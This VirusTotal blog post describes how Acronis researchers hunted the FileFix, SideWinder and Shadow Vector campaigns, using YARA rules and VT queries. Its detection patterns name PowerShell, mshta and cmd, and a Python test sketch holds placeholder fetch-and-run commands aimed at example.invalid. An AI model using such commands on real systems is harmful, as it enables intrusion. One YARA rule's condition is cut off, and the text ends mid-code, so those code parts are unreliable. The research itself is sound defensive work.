VirusTotal Blog
VTPRACTITIONERS{ACRONIS}: Tracking FileFix, Shadow Vector, and SideWinder 10 November 2025 at 12:56

Introduction

We have recently started a new blog series called #VTPRACTITIONERS. This series aims to share with the community what other practitioners are able to research using VirusTotal from a technical point of view.

Our first blog saw our colleagues at SEQRITE tracking UNG0002, Silent Lynx, and DragonClone. In this new post, Acronis Threat Research Unit (TRU) shares practical insights from multiple investigations, including the ClickFix variant known as FileFix, the long-running South Asian threat actor SideWinder, and the SVG-based campaign targeting Colombia and named Shadow Vector.

How VT plays a role in hunting for analysts

For the threat analyst, web-based threats present a unique set of challenges. Unlike file-based malware, the initial stages of a web-based attack often exist only as ephemeral artifacts within a browser. The core of the investigation relies on dissecting the components of a website, from its HTML and JavaScript to the payloads it delivers. This is where VT's capabilities for archiving and analyzing web content become critical.

VT allows analysts to move beyond simple URL reputation checks and delve into the content of web pages themselves. For attacks like the *Fix family, which trick users into executing malicious commands, the entire attack chain is often laid bare within the page's source code. The analyst's starting point becomes the malicious commands themselves, such as navigator.clipboard.writeText or document.execCommand("copy"), which are used to surreptitiously copy payloads to the victim's clipboard.

The Acronis team's investigation into the FileFix variant demonstrates a practical application of this methodology. Their research began not with a specific sample, but with a hypothesis that could be translated into a set of hunting rules. Using VT's Livehunt feature, they were able to create YARA rules that searched for new web pages containing the clipboard commands alongside common payload execution tools like powershell, mshta, or cmd. This proactive hunting approach allowed them to cast a wide net and identify potentially malicious sites in real-time.

One of the main challenges in this type of hunting is striking a balance between rule specificity and the need to uncover novel threats. Overly broad rules can lead to a deluge of false positives, while highly specific rules risk missing creatively crafted commands. The Acronis team addressed this by creating multiple rulesets with varying levels of specificity, allowing them to both find known threats and uncover new variants like FileFix.

In the case of the SideWinder campaign, which uses document-based attacks, VT's value comes from its rich metadata and filtering capabilities. Analysts can hunt for malicious documents exploiting specific vulnerabilities, and then narrow the results to specific geographic regions using submitter country information. This allows them to isolate threats that match a specific actor's profile, such as SideWinder's focus on South Asia.

Similarly, for the Shadow Vector campaign, which used malicious SVG files to target users in Colombia, VT's content search and archiving proved essential. The platform's ability to store and index SVG content allowed researchers to identify a campaign using judicial-themed lures. By combining content searches for legal keywords with filters like submitter:CO, the Acronis team could map the entire infection chain and its infrastructure, transforming fragmented indicators into a comprehensive intelligence picture.

Acronis - Success Story

[In the words of Acronis…]

Acronis Threat Research Unit (TRU) used VirusTotal’s platform for threat hunting and intelligence across several investigations, including FileFix, SideWinder, and Shadow Vector. In the FileFix case, TRU used VT’s Livehunt framework, developing rules to identify malicious web pages using clipboard manipulation to deliver PowerShell payloads. The ability to inspect archived HTML and JavaScript within the VirusTotal platform allowed the team to uncover not only known Fix-family attacks but also previously unseen variants that shared code patterns.

VirusTotal’s data corpus also supported Acronis TRU’s broader threat tracking. In the SideWinder campaign, VT’s metadata and sample filtering capabilities helped analysts trace targeted document-based attacks exploiting tag:CVE-2017-0199 and tag:CVE-2017-11882 across South Asia, leading to the creation of hunting rules later published in “From banks to battalions: SideWinder’s attacks on South Asia’s public sector”.

Similarly, during the “Shadow Vector targets Colombian users via privilege escalation and court-themed SVG decoys” investigation, VT’s archive of SVG content exposed a campaign targeting Colombian entities that embedded judicial lures and external payload links within SVG images. By correlating samples with metadata filters such as submitter:CO and targeted content searches for terms like href="https://" and legal keywords, the team mapped an entire infection chain and its supporting infrastructure. Across all these efforts, VirusTotal provided a unified environment where Acronis could pivot, correlate, and validate findings in real time, transforming fragmented indicators into comprehensive, actionable intelligence.

Hunting Exploits Like It’s 2017-0199 (SideWinder Edition)

SideWinder is a well-known threat actor that keeps going back to what works. Their document-based delivery chain has been active for years, and the group continues to rely on the same proven exploits to target government and defense entities across South Asia. Our goal in this hunt was to get beyond just finding samples. We wanted to understand where new documents were surfacing, who they were likely aimed at, and what types of decoys were in circulation during the latest campaign wave. VirusTotal gave us the visibility we needed to do that efficiently and at scale.

We started by digging into Microsoft Office and RTF files recently uploaded to VirusTotal that were tagged with CVE-2017-0199 or CVE-2017-11882 and coming from Pakistan, Bangladesh, Sri Lanka, and neighboring countries. By filtering based on VT metadata such as submitter country and file type, and by excluding obvious noise from bulk submissions or unrelated activity, we could narrow our focus to the samples that actually fit SideWinder’s operational profile.
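The same filters can also be tried as an interactive VT Intelligence search before they are turned into a rule. The sketch below only assembles the query string and does not call VirusTotal. `or_group` and `build_maldoc_query` are hypothetical helper names, and the `type:` values are assumptions that should be checked against the search modifier documentation.

```python
def or_group(modifier, values):
    """Return '(modifier:v1 OR modifier:v2 ...)' for one search modifier."""
    return "(" + " OR ".join(f"{modifier}:{value}" for value in values) + ")"


def build_maldoc_query(cves, countries, file_types):
    """Combine the three filter groups; a space between groups acts as AND."""
    return " ".join([
        or_group("tag", [cve.lower() for cve in cves]),
        or_group("submitter", countries),
        or_group("type", file_types),  # assumed modifier values, verify before use
    ])


query = build_maldoc_query(
    cves=["CVE-2017-0199", "CVE-2017-11882"],
    countries=["PK", "LK", "BD", "NP", "MM", "MV", "AF"],
    file_types=["doc", "docx", "rtf"],
)
print(query)
```

Keeping the country list in one place makes it easy to drop a noisy submitter country from both the search and the rule at the same time.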

/*
    Checks if the file is tagged with CVE-2017-0199 or CVE-2017-11882
    and originates from one of the targeted countries
    and the file type is a Word document, RTF, or MS-Office file
*/
import "vt"
rule hunting_cve_maldocs {
    meta:
        author = "Acronis Threat Research Unit (TRU)"
        description = "Hunting for malicious Word/RTF files exploiting CVE-2017-0199 or CVE-2017-11882 from specific countries"
        distribution = "TLP:CLEAR"
        version = "1.2"

    condition:
        // Match if the file has CVE-2017-0199 or CVE-2017-11882 in the tags
        for any tag in vt.metadata.tags : 
        ( 
            tag == "cve-2017-0199" or 
            tag == "cve-2017-11882" 
        )
        // Originates from a specific country?
        and 
        (
            // Removed CN due to spam submissions of related maldocs
            vt.metadata.submitter.country == "PK" or 
            vt.metadata.submitter.country == "LK" or 
            vt.metadata.submitter.country == "BD" or 
            vt.metadata.submitter.country == "NP" or 
            vt.metadata.submitter.country == "MM" or 
            vt.metadata.submitter.country == "MV" or 
            vt.metadata.submitter.country == "AF"
        )
        // Is it a DOC, DOCX, or RTF?
        and 
        (
            vt.metadata.file_type == vt.FileType.DOC or
            vt.metadata.file_type == vt.FileType.DOCX or
            vt.metadata.file_type == vt.FileType.RTF
        )
        // Different TA spotted using .ru TLD (excluding it for now)
        and not (
            for any url in vt.behaviour.memory_pattern_urls : (
                url contains ".ru"
            )
        )
        and vt.metadata.new_file
}

Next, we began translating those results into new livehunt rules. The initial version was intentionally broad: match any new document exploiting those CVEs, uploaded from a small list of countries of interest, and restricted to document file types like DOC, DOCX, or RTF. We also added logic to avoid hits that didn’t fit SideWinder’s patterns, such as samples calling out .ru infrastructure tied to other known threat clusters.

A good starting point when creating broad hunting rules is to define a daily notification limit. If everything works as expected and the level of false positives is tolerable, begin refining the rule as more hits arrive in your inbox.

It’s always a good idea to not spam your own inbox when creating broad hunting rules

In our case, the final hunting rule ended up matching a hexadecimal pattern for malicious documents used by SideWinder. By adding filters for submitter country and only triggering on new files, the rule produced a reliable feed of samples that we could confidently attribute to this actor for further analysis.

/*
    Sidewinder related malicious documents exploiting CVE 2017-0199 used during 2025 campaign
*/
import "vt"
rule apt_sidewinder_documents
{
    meta:

        author = "Acronis Threat Research Unit (TRU)"
        description = "Sidewinder related malicious documents exploiting CVE 2017-0199"
        distribution = "TLP:CLEAR"
        version = "1.0"

    strings:

        $a1 = {62544CB1F0B9E6E04433698E85BFB534278B9BDC5F06589C011E9CB80C71DF23}
        $a2 = {E20F76CDABDFAB004A6BA632F20CE00512BA5AD2FE8FB6ED9EE1865DFD07504B0304140000}

    condition:

        filesize

Once we refined the rule set, SideWinder activity became much easier to track consistently. We began to see new decoys appear in near real time, allowing us to monitor changes in themes and spot repeated use of lure content and infrastructure across different campaigns. Using the same logic in retrohunt confirmed our observations that SideWinder had been using the same tactics for months, only changing the decoy topics while keeping the underlying delivery technique intact.

Using Retrohunt to uncover additional samples and establish the threat actor’s timeline

We also observed geofencing behavior in the delivery chain. If the server hosting the external resource did not recognize the visitor or the IP range did not match the intended target, the server often returned a benign decoy file (or an HTTP 404 error code) instead of the real payload.

While relying on exploits from 2017, SideWinder carefully filters the victims that will receive the final malicious payload

One recurring decoy had the SHA256 hash 1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a, which corresponds to an empty RTF document. That decoy is useful as a hunting pivot: by searching for that hash and combining it with submitter country and file type filters in VT, you can separate likely targeted, genuine hits from broad noise and map where geofencing is being applied.
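When triaging responses already collected from a suspected delivery server (for example, files archived in VT), the geofencing outcomes described above can be labeled with a small helper. This is a minimal sketch, not the Acronis tooling: `classify_response` and its labels are hypothetical, and the only known-decoy value is the SHA256 quoted in the text.

```python
import hashlib

# SHA256 of the empty RTF decoy quoted in the text above.
KNOWN_DECOYS = {
    "1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a",
}


def classify_response(status_code, body, known_decoys=KNOWN_DECOYS):
    """Label one archived HTTP response from a suspected delivery server."""
    if status_code == 404:
        return "blocked"            # server refused to serve this visitor
    digest = hashlib.sha256(body).hexdigest()
    if digest in known_decoys:
        return "decoy"              # benign file returned to non-targets
    return "candidate-payload"      # needs manual analysis
```

Counting the three labels per submitter country gives a rough view of where the geofence lets the real payload through.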

RTF empty decoy file used by SideWinder still presents valuable information for pivoting into other parts of their infrastructure

In addition, VirusTotal allowed us to trace the attack back to the initial infection vector and recover some of the spear phishing emails that started the chain. We pivoted from known samples and shared strings, and used file relations to follow linked URLs and artifacts upstream, and found an .eml file that contained the original message and attachment. One concrete example is the spear phish titled 54th CISM World Military Naval Pentathlon 2025 - Invitation.eml, indexed in VirusTotal with behavior metadata and attachments tied to the same infrastructure.

Getting initial infection spear-phishing e-mails allowed us to put together the different pieces of the puzzle, from beginning to end

For other hunters, the key takeaway is that even older exploits like CVE-2017-0199 can reveal a lot when you combine multiple VirusTotal features. In this case, we used metadata, livehunt, and regional telemetry to connect seemingly unrelated samples. We also checked hashtags and community votes, including those from researchers like Joseliyo, to cross-check our assumptions and spot ongoing discussions about similar activity. The Telemetry tab helped us see where submissions were coming from geographically, and the Threat Graph view made it easier to visualize how documents, infrastructure, and payloads were linked.

Every single data point counts when hunting for new samples

Using these tools together turned a noisy set of samples into a clear picture of SideWinder’s targeting and operations.

Uncovering Shadow Vector’s SVG-Based Crimeware Campaign in Colombia

During our research, we identified a campaign we refer to as Shadow Vector, which used malicious SVG images crafted as court summonses and legal notifications to target users in Colombia.

An example of a rendered SVG lure with a judicial correspondence theme

These files mimicked official judicial correspondence and contained embedded links to externally hosted payloads, such as script-based downloaders or password-protected archives. The investigation began after we noticed an unusual pattern of SVG submissions from Colombia. By using a small set of samples for an initial rule, we began our hunt.

/*
    This YARA rule detects potentially malicious SVG files that are likely being used for crimeware campaigns targeting Colombia.
    The rule identifies SVG images that contain legal or judicial terms commonly used in phishing scams,
    along with embedded external links that could be used to deliver a payload.
*/
import "vt"
rule crimeware_svg_colombia {
   meta:
        author = "Acronis Threat Research Unit (TRU)"
        description = "Detects potentially malicious SVG files that are likely being used for crimeware campaigns targeting Colombia"
        distribution = "TLP:CLEAR"
        version = "1.1"

        // Reference hashes
        hash1 = "6d4a53da259c3c8c0903b1345efcf2fa0d50bc10c3c010a34f86263de466f5a1"
        hash2 = "2aae8e206dd068135b16ff87dfbb816053fc247a222aad0d34c9227e6ecf7b5b"
        hash3 = "4cfeab122e0a748c8600ccd14a186292f27a93b5ba74c58dfee838fe28765061"
        hash4 = "9bbbcb6eae33314b84f5e367f90e57f487d6abe72d6067adcb66eba896d7ce33"
        hash5 = "60e87c0fe7c3904935bb1604bdb0b0fc0f2919db64f72666b77405c2c1e46067"
        hash6 = "609edc93e075223c5dc8caaf076bf4e28f81c5c6e4db0eb6f502dda91500aab4"
        hash7 = "4795d3a3e776baf485d284a9edcf1beef29da42cad8e8261a83e86d35b25cafe"
        hash8 = "5673ad3287bcc0c8746ab6cab6b5e1b60160f07c7b16c018efa56bffd44b37aa"
        hash9 = "b3e8ab81d0a559a373c3fe2ae7c3c99718503411cc13b17cffd1eee2544a787b"
        hash10 = "b5311cadc0bbd2f47549f7fc0895848adb20cc016387cebcd1c29d784779240c"
        hash11 = "c3319a8863d5e2dc525dfe6669c5b720fc42c96a8dce3bd7f6a0072569933303"
        hash12 = "cb035f440f728395cc4237e1ac52114641dc25619705b605713ecefb6fd9e563"
        hash13 = "cf23f7b98abddf1b36552b55f874ae1e2199768d7cefb0188af9ee0d9a698107"
        hash14 = "f3208ae62655435186e560378db58e133a68aa6107948e2a8ec30682983aa503"

   strings:
        // SVG 
        $svg = "<svg xmlns=" ascii fullword

        // Documents containing legal or judicial terms
        $s1 = "COPIA" nocase
        $s2 = "CITACION" nocase
        $s3 = "JUZGADO" nocase
        $s4 = "PENAL" nocase
        $s5 = "JUDICIAL" nocase
        $s6 = "BOGOTA" nocase
        $s7 = "DEMANDA" nocase

        // When image loads it retrieves payload from external website using HTTPS
        $href1= "href='https://" nocase
        $href2 = "href=\"https://" nocase

   condition:
      $svg 
      and filesize < 3MB
      and 3 of ($s*)
      and any of ($href*)
      and vt.metadata.submitter.country == "CO"
}

By including reference hashes from manually verified samples, we used a broad hunting rule both as a detection mechanism and as a pivot point for uncovering related infrastructure or newly generated lures.

Once the initial hunting logic was in place, we refined it into a livehunt rule specifically tailored for SVG-based decoys. The rule matched files containing judicial terminology and outbound HTTPS links, while filtering by file size and origin to reduce false positives. Using this rule, we began collecting and analyzing related uploads.
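For checking the rule logic against files you already have on disk, the same conditions can be approximated in Python. This is a rough offline mirror of the rule, not a replacement for YARA: `looks_like_svg_lure` is a hypothetical name, the submitter country has to be supplied by the caller because it only exists as VT metadata, and the `fullword` modifier is not reproduced.

```python
import re

LEGAL_TERMS = ["COPIA", "CITACION", "JUZGADO", "PENAL", "JUDICIAL", "BOGOTA", "DEMANDA"]
HREF_RE = re.compile(r"""href=['"]https://""", re.IGNORECASE)
MAX_SIZE = 3 * 1024 * 1024  # YARA's 3MB


def looks_like_svg_lure(data: bytes, submitter_country: str) -> bool:
    """Approximate the rule: SVG marker, size cap, 3+ legal terms, HTTPS href, CO."""
    text = data.decode("latin-1").lower()  # latin-1 never fails on arbitrary bytes
    terms_found = sum(1 for term in LEGAL_TERMS if term.lower() in text)
    return (
        b"<svg xmlns=" in data              # case-sensitive, like $svg
        and len(data) < MAX_SIZE
        and terms_found >= 3
        and HREF_RE.search(text) is not None
        and submitter_country == "CO"
    )
```

Running this over the reference samples and a folder of ordinary SVG icons is a quick way to see which condition does most of the filtering.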

We used the VT Diff functionality to compare variations between samples and quickly spot patterns, such as repeated words, hexadecimal values, URLs, or metadata tags that hinted at automated generation (i.e. the string “Generado Automaticamente”).
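The idea behind this comparison can be illustrated locally with a very rough analogue: tokens that appear in every sample are candidate rule strings, while tokens that differ (such as per-sample URLs) are not. This is only a sketch of the concept and not how VT Diff is implemented; `shared_tokens` and the token pattern are assumptions made for illustration.

```python
import re

# Runs of 6+ characters that commonly make up words, URLs and identifiers.
TOKEN_RE = re.compile(r"[A-Za-z0-9_:/.\-]{6,}")


def shared_tokens(samples):
    """Return tokens present in every sample, longest first."""
    token_sets = [set(TOKEN_RE.findall(sample)) for sample in samples]
    if not token_sets:
        return []
    common = set.intersection(*token_sets)
    return sorted(common, key=lambda token: (-len(token), token))


samples = [
    '<svg><!-- Generado Automaticamente --><a href="https://a.example/1">JUZGADO 01</a></svg>',
    '<svg><!-- Generado Automaticamente --><a href="https://b.example/2">JUZGADO 02</a></svg>',
]
common = shared_tokens(samples)
```

In this toy input the generator comment and the judicial keyword survive the intersection, while the per-sample URLs drop out.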

VT Diff feature helped us to identify patterns

Results of our VT Diff session

While we could not conclusively attribute the SVG decoy campaign to Blind Eagle at the time of research, the technical and thematic overlaps were difficult to ignore. The VT blog “Uncovering a Colombian Malware Campaign with AI Code Analysis” describes similar judicial-themed SVG files used as lures in operations targeting Colombian users. As with other open reports on this threat actor, attribution remains based on cumulative evidence, clustering campaigns based on commonalities such as infrastructure reuse, phishing template design, malware family selection, and linguistic or regional indicators observed across samples.

rule crimeware_shadow_vector_svg
{

    meta:

        description = "Detects malicious SVG files associated with Shadow Vector's Colombian campaign"
        author = "Acronis Threat Research Unit (TRU)"
        file_type = "SVG"
        malware_family = "Shadow Vector"
        threat_category = "Crimeware / Malicious Image / Embedded Payload"
        tlp = "TLP:CLEAR"

    strings:

        $svg_tag1 = "<?xml" ascii
        $svg_tag2 = "<svg" ascii
        $svg_tag3 = "<!DOCTYPE svg" ascii
        $svg_tag4 = "http://www.w3.org/2000/svg" ascii 

        //used by Shadow Vector (possibly generated in batch)

        $judicial = "juzgado" ascii nocase
        $judicial_1 = "citacion" ascii nocase
        $judicial_2 = "judicial" ascii nocase
        $judicial_3 = "despacho" ascii nocase
        $generado = "Generado" ascii nocase

    condition:

        filesize < 3MB and
        3 of ($svg_tag*) and
        (1 of ($judicial*) and $generado)
}

The evolution from the initial hunting rule to the refined detection rule illustrates our approach to threat hunting in VT, iterative and continuously refined through testing and analysis. The first rule was broad, meant to surface related samples and reveal the full scope of the campaign. It proved useful in livehunt and retrohunt, helping us find clusters of judicial-themed SVGs and their linked payloads. As the investigation progressed, we focused on precision, reducing false positives and removing elements that did not add value. Tuning a rule is always a balance: removing one pattern might miss some samples, but it can also make the rule more accurate and easier to maintain.

FileFix in the wild!

A few weeks ago, the TRU team at Acronis released research on a (at the time) rarely seen variant of the ClickFix attack, called FileFix. Much of the investigation of this attack vector was possible thanks to VirusTotal’s ability to archive, search, and write rules for finding web pages. We at Acronis, together with VT, wanted to share a bit of information on how we did it, so that others can better research this type of emerging threat.

Anatomy of an attack: where do we start?

Like many phishing attacks, *Fix attacks rely on malicious websites where victims are tricked into running malicious commands. Lucky for us, these attacks have a few particular components that are common to all, or many, *Fix attacks. Using VT, we were able to write rules and livehunt for any new web pages that included these components, and to quickly iterate on rules that were too broad.

One thing all *Fix attacks have in common is that they copy a malicious command to the victim's clipboard. Copying the command for the user, rather than letting them copy it themselves, lets attackers hide the malicious part of the command and show only a smaller, “benign” portion when the victim pastes it into the Windows Run dialog or the address bar. This commonality gives us two great strings to hunt for:

The commands used to copy text into the victim's clipboard
The commands used to construct the malicious payload

We began our research by using the Livehunt feature, writing a rule to detect navigator.clipboard.writeText and document.execCommand("copy"), both used for copying to the clipboard, as well as any string including the words powershell, mshta, cmd, and other commands we commonly find in *Fix attacks. In its most basic form, a rule might look like this:

import "vt"

rule ClickFix
{
  strings:
    $clipboard = /(navigator\.clipboard\.writeText|document\.execCommand\(\"copy\"\))/
    $pay01 = /(powershell|cmd|mshta|msiexec|pwsh)/i
  condition:
    vt.net.url.new_url and
    $clipboard and
    any of ($pay*)
}

However, this is far from enough. There are plenty of benign sites that use the copy to clipboard feature, and also have the words powershell or cmd present (the three letters “cmd” appear often as part of Base64 strings). This makes things a bit more tricky, as it requires us to iron out these false positives. We need to make our patterns look more similar to real powershell or cmd commands.
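The Base64 problem is easy to reproduce. The sketch below uses Python's `re` module as a stand-in for the YARA patterns (an approximation, since the two regex engines are not identical) and a made-up page fragment whose only "payload" is three harmless bytes.

```python
import base64
import re

NAIVE_PAYLOAD_RE = re.compile(r"(powershell|cmd|mshta|msiexec|pwsh)", re.IGNORECASE)

# Three harmless bytes whose Base64 form happens to start with "cmd".
benign_blob = base64.b64encode(b"rgA").decode()

# Hypothetical benign page fragment: a "copy token" button.
benign_page = 'navigator.clipboard.writeText("' + benign_blob + '")'

naive_hit = (
    "navigator.clipboard.writeText" in benign_page
    and NAIVE_PAYLOAD_RE.search(benign_page) is not None
)
```

Here `naive_hit` is true even though nothing on the page resembles a command, which is the kind of false positive the broad rule produces at scale.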

Unfortunately, there is such huge variance in how these commands are written that the more rigid our patterns became, the more likely we were to miss a true positive that included something we hadn’t seen before or couldn’t think of. This requires a balancing act: if your rules are too rigid, you will miss true positives that employ a creatively crafted command; too loose, and you will receive a large number of false positives, which will slow down the investigation.

For example, we can narrow the rule so that it favors true positives by matching a string that better resembles the powershell commands we’ve seen in ClickFix payloads. One option is to require “iex”, the alias for the Invoke-Expression cmdlet, which tells powershell to execute a string as a command:

$pay03 = /powershell.{,80}iex/

This will match whenever the word powershell appears, with the word iex appearing 0 to 80 characters after it. This should reduce the number of false positives we see related to powershell, as it more clearly resembles a powershell command, but at the same time limits our rule to only catch powershell commands that follow this structure- any true positive command with more than 80 characters between the word powershell and iex, or commands forgoing the use of iex, will not be caught.
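The trade-off can be checked quickly with the same pattern in Python's `re` module, which accepts the `{,80}` quantifier as well. The command strings are harmless placeholders invented for this sketch, and `matches` is a hypothetical helper.

```python
import re

PAY03 = re.compile(r"powershell.{,80}iex")


def matches(command):
    """True when 'iex' follows 'powershell' within 80 characters on one line."""
    return PAY03.search(command) is not None


close_gap = "powershell -w hidden -c iex (irm https://example.invalid/a)"
wide_gap = "powershell " + "-nop " * 20 + "iex (irm https://example.invalid/a)"
no_iex = "powershell -enc AAAA"
mixed_case = "PowerShell -c iex (irm https://example.invalid/a)"

results = [matches(c) for c in (close_gap, wide_gap, no_iex, mixed_case)]
```

Only `close_gap` matches. The padded command, the one without iex, and the one spelled "PowerShell" all slip through, because the pattern as written is also case-sensitive.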

We ended up setting up a number of separate rulesets: some were more specific, others more generic. The more generic ones helped us tune our more specific rulesets. This tactic allowed us to find a large number of ClickFix attacks. Most were run-of-the-mill fake captchas leveraging ClickFix; others were more interesting. As we continued fine-tuning our rules, and within a week of setting up our Livehunt, one of our more generic rules made an interesting detection. At first glance it appeared to be a false positive, but as we looked closer, we discovered that it was exactly what we were hoping to find: a FileFix attack.

Analyzing payloads

One of the nicest things about researching a *Fix attack is that the payload is right there on the website, in plain sight. This offers a few advantages. The first is that we can examine the payload even when the phishing site itself is down, as long as it’s archived by VT. The second is that we can search for similar patterns via VT queries to try to catch other attacks from the same campaign.

Payloads are visible directly in VT by using the content tab on any suspected website (in this case, the payload is obfuscated)

Often, these payloads contain additional malicious URLs that are used to download and execute further payloads. These can also be examined very easily on VT, and any files they lead to may also be downloaded directly from VT.

In our investigation of the FileFix site, we found that the payload (a powershell command) downloads an image, and then runs a script that is embedded in the image file. That second-stage script then decrypts and extracts an executable from the image and runs it.

FileFix site downloading and extracting code from an image (highlighted)

We were using both a VM and VT to investigate these payloads. One interesting way we were able to use VT is to track additional examples of the malicious images, as parts of the command were embedded as strings in the image file, allowing us to match these patterns via a VT query and find new examples of the attack, or by searching for the file name or the domain which hosts it.
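Finding those embedded strings in a downloaded image does not require special tooling. The sketch below pulls printable ASCII runs out of a binary blob, much like the Unix `strings` utility, and keeps the ones that mention script-related keywords. The function names and the keyword list are illustrative assumptions, not the strings Acronis pivoted on.

```python
import re

KEYWORDS = ("powershell", "iex", "frombase64string")  # illustrative only


def printable_strings(data: bytes, min_len: int = 8):
    """Yield runs of printable ASCII at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    for match in re.finditer(pattern, data):
        yield match.group().decode("ascii")


def suspicious_strings(data: bytes, keywords=KEYWORDS):
    """Return printable strings that contain any keyword (case-insensitive)."""
    return [
        s for s in printable_strings(data)
        if any(keyword in s.lower() for keyword in keywords)
    ]
```

Any distinctive string found this way can then be used in a VT content search to look for other images built by the same tooling.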

Pivoting on the domain hosting malicious .jpg files, to investigate additional stages of the attack, archived by VT

VT has been extremely helpful in allowing us to very easily analyze malicious URLs used not only for phishing, but also for delivering malware and additional scripts. In some examples, we were able to get quite far along the chain of scripts and payloads without ever having to spin up a VM, just by looking at the content tab, to see what’s inside a particular file. That’s not going to be the case every time, but it’s certainly nice when it does happen.

The malicious images used during the attack contain parts of the malicious code used in the second stage of the attack

By pivoting on specific strings from within that code, we are able to locate other samples of the malicious images and scripts created by the same attacker, and further pivot to uncover their infrastructure

The ability to investigate and correlate various stages, or multiple samples from the same attacker, was a huge boon to us during the investigation. It allowed us to quickly connect the dots without leaving VT, and should be a great asset in your investigation.

Looking for a *Fix

So now that you know all this- what's next? How can this be useful? Well, we hope it can be helpful in a number of ways.

Firstly, working together as a community, it is important that we continue to catch and block URLs that are employing *Fix attacks. It’s not easy to detect a *Fix site dynamically, and prevention may still happen in many cases after the payload has already been run. Maintaining a robust blocklist remains a very good and accessible option for stopping these threats.

Secondly, those of us interested in continuing to track this threat and follow its evolution may use this to find these threats and potentially automate detection. As a side note, *Fix attacks are great investigation topics for those of us starting out in security: as long as appropriate precautions are taken, they can be investigated relatively safely via VT, and they are very useful for learning about malicious commands, phishing sites, etc.

Thirdly, for those of us protecting organizations, this can be a useful guide for finding these attacks by yourself, in the wild, in order to gain a deeper understanding of how they operate, and what relevant ways you can find to defend your organization, although there are certainly many reports written on the subject which would also come in handy.

VT Tips (based on the success story)

[In the words of VirusTotal…]

The Acronis team’s investigation into FileFix, SideWinder, and Shadow Vector is a goldmine of threat hunting techniques. Let’s move beyond the narrative and extract some advanced, practical methods you can apply to your own hunts for web-based threats and multi-stage payloads.

Supercharge Your Web-Content YARA Rules

A simple YARA rule looking for clipboard commands and "powershell" is a good start, but attackers know this. You can significantly improve your detection rate by building rules that look for the context in which these commands appear.

Instead of a generic search, try focusing on the obfuscation and page structure common in these attacks. For instance, attackers often hide their malicious script inside other functions or encoded strings. Your YARA rules can hunt for the combination of a clipboard command and indicators of de-obfuscation functions like atob() (for Base64) or String.fromCharCode.

Combine content searches with URL metadata. The content modifier is also available for URLs: when you set the entity to url, you can use it to search for strings within the URL content. For example, the following query can help identify potential ClickFix URLs by combining some of the findings shared by Acronis with strings commonly used to evade detection.

entity:url (content:"navigator.clipboard.writeText" or content:"document.execCommand(\"copy\")") (content:"String.fromCharCode" or content:"atob")
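Once such a query returns candidate pages, the de-obfuscation step itself can be automated for the simplest case. This is a minimal sketch that only handles literal `atob("...")` calls in archived page source. `decoded_atob_hits` and both patterns are assumptions for illustration, and real pages often split or build the string dynamically.

```python
import base64
import binascii
import re

ATOB_RE = re.compile(r"""atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
PAYLOAD_RE = re.compile(r"\b(powershell|pwsh|mshta|msiexec|cmd(\.exe)?)\b", re.IGNORECASE)


def decoded_atob_hits(page_source):
    """Decode literal atob() arguments and return those that mention a launcher."""
    hits = []
    for blob in ATOB_RE.findall(page_source):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not valid Base64, ignore
        if PAYLOAD_RE.search(decoded):
            hits.append(decoded)
    return hits
```

Matching on the decoded text avoids the "cmd inside Base64" false positives that plague keyword searches on the raw page.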

Dissect Payloads with Advanced Content Queries

When you find a payload, as Acronis did within the FileFix site's source code, your job has just begun. The next step is to find related samples. Attackers often reuse code, and even when they obfuscate their scripts, unique strings or logic patterns can give them away. Isolate unique, non-generic parts of the script. Look for:

Custom function names
Specific variable names
Uncommon comments
Unique sequences of commands or API calls

Focus on the unobfuscated parts of the code. In the FileFix payload, the attackers might obfuscate the C2 domain, but the PowerShell command structure used to decode and run it could be consistent across samples. Use that structure as your pivot. For example, if a payload uses a specific combination of [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(...)), you can build a query to find other files using that exact deobfuscation chain.

behavior:"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("

Don't forget about the infrastructure

Acronis has been tracking SideWinder in a very intelligent way. Their experience with VirusTotal is evident. Most of our users use VirusTotal primarily for file analysis, but sometimes we forget that there are powerful features for tracking infrastructure through livehunt.

In the SideWinder intrusions, there is a continuously monitored hash that corresponds to a decoy file, and this file is downloaded from different URLs.

ITW URLs means that these URLs were downloading the file being studied, in this case the RTF decoy file

An interesting way to proactively identify new URLs quickly is by creating a YARA rule in livehunt for URLs, where the objective is to discover new URLs that are downloading that specific RTF decoy file.

import "vt"

rule URLs_Downloading_Decoy_RTF_SideWinder {

  meta:
    target_entity = "url"
    author = "Virustotal"
    description = "This YARA rule identifies new URLs downloading the decoy file related to SideWinder"

  condition:
    vt.net.url.downloaded_file.sha256 == "1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a" 
    and vt.net.url.new_url
}

Another approach that could also be interesting is to directly query the itw_urls relationship of the decoy file using the API. One use case could be creating a script that regularly (perhaps daily) calls the relationship API, retrieves the URLs, stores them in a database, and then repeats the call each day to identify new URLs. It's a simple, yet effective way to integrate with technology that any company might already have.

The following code snippet can be executed in Google Colab. Once you provide your API key, all the itw_urls related to the decoy file will be available in the all_itw_urls variable.

!pip install vt-py nest_asyncio
import getpass, vt, json, nest_asyncio
nest_asyncio.apply()

cli = vt.Client(getpass.getpass('Introduce your VirusTotal API key: '))

FILEHASH = "1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a"
RELATIONS = "itw_urls"
all_itw_urls = []

async for itemobj in cli.iterator(f'/files/{FILEHASH}/{RELATIONS}', limit=0):
    all_itw_urls.append(itemobj.to_dict())
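The daily comparison described above can be sketched with the standard library alone. This is a minimal illustration, assuming each item in all_itw_urls is a dictionary with an "id" key and the URL string under attributes → url (verify the shape against your own API responses). The table name seen_urls and the helper store_and_diff are hypothetical.

```python
import sqlite3

def store_and_diff(conn: sqlite3.Connection, items: list[dict]) -> list[str]:
    """Insert unseen URLs into the database and return the ones that are new."""
    conn.execute(
        "CREATE TABLE IF NOT EXISTS seen_urls ("
        "id TEXT PRIMARY KEY, url TEXT, first_seen TEXT DEFAULT CURRENT_TIMESTAMP)"
    )
    new_urls = []
    for item in items:
        url = item.get("attributes", {}).get("url", "")
        # INSERT OR IGNORE leaves existing rows untouched; rowcount is 1 only for new rows.
        cur = conn.execute(
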